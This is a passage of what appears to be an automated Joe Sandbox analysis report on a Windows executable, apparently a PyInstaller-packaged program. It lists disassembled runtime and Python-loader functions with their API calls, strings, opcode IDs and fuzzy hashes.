                                                              • Instruction ID: 6fbc9857c4937a9933242a782e48884cf24c36f4a7c08b1976389c8317e457e7
                                                              • Opcode Fuzzy Hash: cd3a9f3ea8ef265e1697b25d2233ff7099ae2ab5e22e5ab4fa41e006c1c379b1
                                                              • Instruction Fuzzy Hash: 1E11C465E18A8281DB20CB25A54417A6361AB48BF8F680331EE7E87BF9EE3CD050C700
                                                              Function 00007FF6FB1F9C58 Relevance: 3.0, APIs: 2, Instructions: 19threadCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6FB202032,?,?,?,00007FF6FB20206F,?,?,00000000,00007FF6FB202535,?,?,?,00007FF6FB202467), ref: 00007FF6FB1F9C6E
                                                              • GetLastError.KERNEL32(?,?,?,00007FF6FB202032,?,?,?,00007FF6FB20206F,?,?,00000000,00007FF6FB202535,?,?,?,00007FF6FB202467), ref: 00007FF6FB1F9C78
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                              • String ID:
                                                              • API String ID: 588628887-0
                                                              • Opcode ID: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                              • Instruction ID: 51bb9e03f3e897eae2def5a8f91c3a9cbbd468c0c523b6bf9e85a288c7dd095d
                                                              • Opcode Fuzzy Hash: 9fa0b27d1784483699343fce5d0d8fb71a2fef38db5c10c130c8b92919593777
                                                              • Instruction Fuzzy Hash: 65E08C10F0864342FF18EBF2A85807912A19F9C794B005030C92EC72F1FE2CA995C300
                                                              Function 00007FF6FB1FB1BC Relevance: 1.6, APIs: 1, Instructions: 112COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                              • Instruction ID: 03150745851d9494dfba7d3a81df21f2f884b34cb97f6064eefa8bbd481ea127
                                                              • Opcode Fuzzy Hash: aa739a885bc1dd54b6575df94a709b393c0322d321e92581108345db9e2bb901
                                                              • Instruction Fuzzy Hash: 4C419E36D0820387EB34DA15E55127E73A0EB59B88F140231DAAEC76E1EF2CF502CB51
                                                              Function 00007FF6FB1E76A0 Relevance: 1.6, APIs: 1, Instructions: 85COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _fread_nolock
                                                              • String ID:
                                                              • API String ID: 840049012-0
                                                              • Opcode ID: 975c3a5ec649139404ac52ecddea46541f176f5586f0ae2f8c4f26f5f44efa62
                                                              • Instruction ID: 2c77d70b92bd71451f16a1fa1d91d6df9601d3ce8bf72cc8eeb6b4d1f6a0d6f3
                                                              • Opcode Fuzzy Hash: 975c3a5ec649139404ac52ecddea46541f176f5586f0ae2f8c4f26f5f44efa62
                                                              • Instruction Fuzzy Hash: CD216F21F0865345FB10EA56A9083BAA641BF4DBD8F884430EE2D96BD6EE7DF046C600
                                                              Function 00007FF6FB1FAC4C Relevance: 1.6, APIs: 1, Instructions: 79COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                              • Instruction ID: 584010f172b4cbb649e79453ea2faef52475fdc500b6b1be7d19eacbab0c1be0
                                                              • Opcode Fuzzy Hash: 49c1b702f419c8ad0ef71248902cf9a0cc608428026b1214a1a74e14a7199740
                                                              • Instruction Fuzzy Hash: B431C122E2865386F711EB1588413BD2660AF58BA9F520235DA7DC33F2EFBCE491C710
                                                              Function 00007FF6FB1F8C79 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: HandleModule$AddressFreeLibraryProc
                                                              • String ID:
                                                              • API String ID: 3947729631-0
                                                              • Opcode ID: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                              • Instruction ID: 595207c17adf287fa3ad07948474392b2cf23d9c41038d4fc3988ac5d0a9e9f8
                                                              • Opcode Fuzzy Hash: ce8bbb5f42c0c70f8d6cb0f644a2b9beff4cd55938d93e86477bcb8353de4fc0
                                                              • Instruction Fuzzy Hash: AA217832E15B06CAEB64DFA4C4442EC33A0FB4871CF54463AD62D86AE9EF38D584DB50
                                                              Function 00007FF6FB1F52A4 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                              • Instruction ID: 18c1d2ee62bbe6ac451d10a3cebda90465851a5b82d96694ff170bbc2f223e22
                                                              • Opcode Fuzzy Hash: c73ce0dbb369862aa70d4e112b5ce78fdf9595fecbc559d5a15d5b25d9b89295
                                                              • Instruction Fuzzy Hash: EE119621E1D643C1EB60EF51D41017EA6A4BF99B88F444131EA6CD76E6EF3CE551C740
                                                              Function 00007FF6FB205664 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                              • Instruction ID: 35c5d3a66de5790085d571a04a69aeacc9efa8447fc38a01dc92675fdc2eda2f
                                                              • Opcode Fuzzy Hash: eb818cef5f83307f6059fb404af21ab2d8804f19963bc1c1518551d96bb4d1ba
                                                              • Instruction Fuzzy Hash: 0C218732A18A8386EB658F18D59037976A0EB9CBD4F145234D66DC76F9EF3DD441CB00
                                                              Function 00007FF6FB1EF6DC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo
                                                              • String ID:
                                                              • API String ID: 3215553584-0
                                                              • Opcode ID: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                              • Instruction ID: 4c7fb3b905a1547dee916c8baf13a20a6da47b09726325c44894966dd1d14d2e
                                                              • Opcode Fuzzy Hash: 1d48df8ff45913ef4d2fe20e3a196162e4d6dc571d0fb1b63797b01b1d6529e7
                                                              • Instruction Fuzzy Hash: A601A121E0878340FB04DB56990106DA795EB99FE8F484631DE7C97BE6EE3CE512C300
                                                              Function 00007FF6FB1FDEA8 Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,?,00000000,00007FF6FB1FA63A,?,?,?,00007FF6FB1F43FD,?,?,?,?,00007FF6FB1F979A), ref: 00007FF6FB1FDEFD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                              • Instruction ID: 291bb6fbc11986cc3b9581f3b0e00c7d10fde55975d0aaef95bb837f310cc3c8
                                                              • Opcode Fuzzy Hash: a50505f3dedbf875c6adc223253d20fad35851e197ada73c0c4444ee90b671f1
                                                              • Instruction Fuzzy Hash: 06F09005F0924B80FF58E76699253B522915F9CB88F4C5430C92EC63F2FE2CE482C250
                                                              Function 00007FF6FB1FC90C Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,?,?,00007FF6FB1EFFB0,?,?,?,00007FF6FB1F161A,?,?,?,?,?,00007FF6FB1F2E09), ref: 00007FF6FB1FC94A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                              • Instruction ID: ee4ed4447ee058291ce304c9d2ea37237cb2e6f2edecaf518085abdf680383f6
                                                              • Opcode Fuzzy Hash: b18cfb789f6bc806f768d700ed4d2a41d5d7e56d76a43a128583cd408f8141a4
                                                              • Instruction Fuzzy Hash: BDF05E00F1824744FF28A66169112791280AF9C7A8F084630D83EC5AE5FE1CE541E210

                                                              Non-executed Functions

                                                              Function 00007FF6FB1E50B0 Relevance: 157.9, APIs: 44, Strings: 46, Instructions: 364libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E50C0
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E5101
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E5126
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E514B
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E5173
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E519B
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E51C3
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E51EB
                                                              • GetProcAddress.KERNEL32(?,00007FF6FB1E5C57,?,00007FF6FB1E308E), ref: 00007FF6FB1E5213
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                              • API String ID: 190572456-2007157414
                                                              • Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                              • Instruction ID: 64fc361415386140762d15d431bcb8a047f2fe96515796d1914d3aec1433a503
                                                              • Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                              • Instruction Fuzzy Hash: 521264A4D1DB0395FB65DB08AAB41B822A1AF4C794F946435D83ED2AF0FF7CB5488340
                                                              Function 00007FF6FB2033BC Relevance: 24.0, APIs: 9, Strings: 4, Instructions: 1226COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                              • API String ID: 808467561-2761157908
                                                              • Opcode ID: 006b587dceb6a8e5448b800068f928c3aefb42c20130fc8eaa47f3b19415637c
                                                              • Instruction ID: a4e7d4496f675aa15f03d4430863fdbe56adf9e781005a3b936fe920968052ee
                                                              • Opcode Fuzzy Hash: 006b587dceb6a8e5448b800068f928c3aefb42c20130fc8eaa47f3b19415637c
                                                              • Instruction Fuzzy Hash: D6B2B672A182834BE7658E65D6A07FD77A1FB5C3C8F406135DA29D7AE4EF38A500CB40
                                                              Function 00007FF6FB1E9FCD Relevance: 12.0, Strings: 9, Instructions: 744COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: invalid bit length repeat$invalid code -- missing end-of-block$invalid code lengths set$invalid distance code$invalid distance too far back$invalid distances set$invalid literal/length code$invalid literal/lengths set$too many length or distance symbols
                                                              • API String ID: 0-2665694366
                                                              • Opcode ID: 7289e34dee421d23927a0f8f8a094fde9ef8b8d5e9feb20e52711e481e6fcba8
                                                              • Instruction ID: ba4aea02f65fb1e4daca20faf5ce1ee6bfae4e5019a4699c8f4dfbfcb8670a5b
                                                              • Opcode Fuzzy Hash: 7289e34dee421d23927a0f8f8a094fde9ef8b8d5e9feb20e52711e481e6fcba8
                                                              • Instruction Fuzzy Hash: B252B372E146A68BD754CF14C458B7E3BA9EB88344F054239EA5A87BD0EF3DE944CB40
                                                              Function 00007FF6FB1EC44C Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                              • String ID:
                                                              • API String ID: 3140674995-0
                                                              • Opcode ID: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                              • Instruction ID: 5407e1aa73fb103a69951b37a3210641d96a59a2e985b166c36ad19798042dac
                                                              • Opcode Fuzzy Hash: 59201671b846c18328c4c6cdbad1e823a2b0fec8eaed916d44c3dc4e1cb48f19
                                                              • Instruction Fuzzy Hash: 02315276A08B8289EB60CF64E8543FE7364FB48748F445039DA5E87BA5EF38D548C710
                                                              Function 00007FF6FB1E29E0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1999072195.00007FF6FB1E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6FB1E0000, based on PE: true
                                                              • Associated: 00000000.00000002.1999032845.00007FF6FB1E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999121496.00007FF6FB20B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB21E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999170508.00007FF6FB224000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1999251826.00007FF6FB226000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7ff6fb1e0000_e45AiBoV6X.jbxd
                                                              Similarity
                                                              • API ID: Message$ErrorFormatLast
                                                              • String ID: %ls%ls: %ls$<FormatMessageW failed.>$Error
                                                              • API String ID: 3971115935-1149178304
                                                              • Opcode ID: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                              • Instruction ID: 4482e84b6ad5bf65a74e22d03059101e436914d5d6b236a7b2aded1bae0be53d
                                                              • Opcode Fuzzy Hash: 0ded6d4e5eeb2df7dd6c32992adf891535d6bffb348d119068df09e90069f5ad
                                                              • Instruction Fuzzy Hash: A5212176618A8682E730DB10F5546EE6364FB8C7C8F400136EA9D93AA8EF7CD5568740
                                                              Function 00007FF6FB204F10 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _get_daylight.LIBCMT ref: 00007FF6FB204F55
                                                                • Part of subcall function 00007FF6FB2048A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6FB2048BC
                                                                • Part of subcall function 00007FF6FB1F9C58: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6FB202032,?,?,?,00007FF6FB20206F,?,?,00000000,00007FF6FB202535,?,?,?,00007FF6FB202467), ref: 00007FF6FB1F9C6E
                                                                • Part of subcall function 00007FF6FB1F9C58: GetLastError.KERNEL32(?,?,?,00007FF6FB202032,?,?,?,00007FF6FB20206F,?,?,00000000,00007FF6FB202535,?,?,?,00007FF6FB202467), ref: 00007FF6FB1F9C78
                                                                • Part of subcall function 00007FF6FB1F9C10: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6FB1F9BEF,?,?,?,?,?,00007FF6FB1F9ADA), ref: 00007FF6FB1F9C19
